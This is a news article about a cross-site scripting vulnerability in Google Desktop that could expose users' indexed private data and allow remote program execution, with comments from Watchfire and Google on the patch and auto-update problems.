Critical Vulnerability Caught In Google Desktop

A security company is advising people who use Google Desktop to immediately download the latest version to protect their computers from a critical vulnerability.

Danny Allan, director of security research at Watchfire, a security and analysis company, says researchers found a vulnerability in Google Desktop that puts users' private information at risk and enables remote attackers to run programs on the infected machines. Allan says they reported the vulnerability to Google on Jan. 4, and the online search leader created a fix for it on Feb. 1.

Allan notes that while Google says it can automatically update its software and take care of the vulnerability, he has had to manually update his three home computers. "The fix is in their latest version," he says. "My software did not [automatically] patch. We had some issues with the updating mechanism. It didn't work at all. We had to install it manually."

Barry Schnitt, a Google spokesman, says the company started pushing out auto updates a few weeks ago and is still in the process of getting to its millions of users. He also says the auto update will work in the "vast majority" of cases. "A fix was developed quickly, and users are being automatically updated with the patch. In addition, we have [added] another layer of security checks to the latest version of Google Desktop to protect users from similar vulnerabilities in the future," Schnitt says.

Google hasn't received any reports of the vulnerability being exploited, Schnitt says. "However, users should make sure they are running the latest version of Google Desktop by going to http://desktop.google.com and downloading the latest version and installing it," he adds.Watchfire's Allan says there actually are three separate flaws wrapped up in this vulnerability. All three are cross-scripting issues, which allow remote users to inject Java script into a Web application like Google Desktop. Allan says about 80% of Web applications are vulnerable to varying degrees to cross-scripting, but the Google Desktop vulnerability "constitutes the most serious outcome that I have seen."

Google Desktop has the ability to cache and remember all of a user's private and corporate information. It basically is a mini agent that lives on the desktop computer and crawls through e-mail, zip files, office documents, and Web sites visited. It indexes all of the information and stores it within its cache.

This vulnerability allows a remote attacker to access this cache and all the information in it, explains Allan.

The malware is introduced to the computer if the user clicks on a link in an e-mail or visits a malicious Web site. The malware connects to that link, according to Allan, and injects the malicious script onto the computer.

Once a computer is infected, the attacker can search for information on the computer and download it to his own system, control how the Web application functions, and run programs remotely on the computer. Allan notes that the first two uses are serious but calls the remote control a critical issue.0